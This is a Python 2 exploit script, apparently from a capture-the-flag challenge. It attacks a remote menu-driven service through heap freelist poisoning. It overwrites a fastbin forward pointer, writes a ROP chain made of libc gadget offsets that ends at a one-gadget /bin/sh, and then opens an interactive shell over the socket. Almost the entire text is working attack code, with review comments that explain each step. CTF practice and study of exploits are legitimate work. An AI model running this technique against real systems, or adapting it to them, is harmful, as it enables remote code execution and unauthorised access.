#!/usr/bin/env python | |
import socket | |
import time | |
import telnetlib | |
import struct | |
# Per-run base addresses of the target's libc mapping and heap. Every
# address packed later in the script is an offset from one of these two.
# NOTE(review): the comment block just before the freelist write quotes a
# heap base of 0x1a34000, which does not match HEAP_BASE here; the constant
# is what the code actually uses, so that comment looks stale.
LIBC_BASE = 0x7eff13bcb000
HEAP_BASE = 0x248b000
# Seconds to pause after every send and every recv (see doRecv/doSend).
SLEEP_TIME = 1
# Python 2 script (print statements, raw_input). telnetlib was deprecated in
# Python 3.11 and removed in 3.13. The Telnet object is created unconnected;
# the socket below is attached to it at the end for the interactive session.
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("pwn.rhme.riscure.com",1337))
#s.connect(("127.0.0.1",1337))
def doRecv():
    """Read up to 1024 bytes from the shared socket, echo them, then pause.

    Uses the module-level socket ``s`` and pauses ``SLEEP_TIME`` seconds so
    the remote side can catch up before the next menu input.
    """
    chunk = s.recv(1024)
    print "<< ", chunk
    time.sleep(SLEEP_TIME)
def doSend(data):
    """Echo *data*, send it followed by a newline, then pause.

    *data* is a str (menu text or packed bytes); a single "\\n" is appended
    so the remote menu treats it as one line of input. Pauses ``SLEEP_TIME``
    seconds after sending.
    """
    print ">> ", data
    line = data + "\n"
    s.send(line)
    time.sleep(SLEEP_TIME)
# Scripted menu interaction with the remote service. Each doSend line is one
# line of menu input; the author's inline comments give the intent of each
# step. All addresses are built from LIBC_BASE / HEAP_BASE defined above.
doRecv()
# Pause so a debugger can be attached; the returned input is never used.
blahfuck = raw_input('attach debugger and press enter..')
doRecv()
doSend("1") # add our fake chunk player
doSend("fake")
doSend("33")
doSend("0")
doSend("33")
doSend("0")
doSend("1")
doSend("hax") # add a player
doSend("1")
doSend("1")
doSend("1")
doSend("1")
doSend("3") # get a pointer to it
doSend("1")
doSend("2") # free underlying data
doSend("1")
doSend("4")
doSend("1")
# the below is a heap offset | this is 0x1620 offset from heap base.
# heap base == 0x1a34000
# offset: 0x1620
# == 0x1a35620
# NOTE(review): the base quoted above (0x1a34000) is not the HEAP_BASE this
# script uses (0x248b000); the three lines above appear to be a stale note
# from an earlier run. Also note '<L' packs 4 bytes here, while the libc
# addresses further down are packed with '<Q' (8 bytes).
doSend(struct.pack('<L', HEAP_BASE + 0x1620)) # modify the freelist FD pointer to point at our fake chunk
doSend("0")
doSend("1")
doSend("A"*128) # alloc a new player with a non-fastbin name to get uneven freelist
doSend("3") # so our poisoned malloc is in response to the Name malloc
doSend("3")
doSend("3")
doSend("3")
doSend("1")
doSend("\x40\x30\x60") # the malloc for this request will be serviced using our poisoned freelist, so will
doSend("4") # return a pointer of our choosing. subsequent writes will be to a destination of
doSend("4") # of our choosing
doSend("4")
doSend("4")
doSend("3")
doSend("0")
doSend("4")
doSend("1")
doSend(struct.pack('<Q', LIBC_BASE + 0x101f80))
doSend("1")
# Three libc offsets; the trailing comments at the end of the file list
# what the author recorded for each of them.
g1 = struct.pack('<Q', LIBC_BASE + 0x34a70)
g2 = struct.pack('<Q', LIBC_BASE + 0x1fb78)
g3 = struct.pack('<Q', LIBC_BASE + 0xcd0f3)
# Final payload goes out via s.send directly rather than doSend: no extra
# newline is appended (the literal already ends in "\n") and there is no
# SLEEP_TIME pause afterwards.
s.send(g1+g2+"\x00\x00\x00\x00\x00\x00\x00\x00" + g3 + "HXHXHXHXHXHXHXHXHXHXH\n")
# Hand the connected socket to the Telnet object and drop into an
# interactive session on it.
t.sock = s
t.interact()
# /bin/sh 0x7f50304e40f3 this is the one requiring RCX and R12 null | libc offset 0xcd0f3
# /bin/sh 0x7f503050d6c0
# 0x7f5030436b7b 0x1fb7b xor eax eax, ret
# 0x7f503044ba70 0x34a70 xor ecx, ecx, .... ret
# 0x7f5030436b78 0x1fb78 pop r12, ret |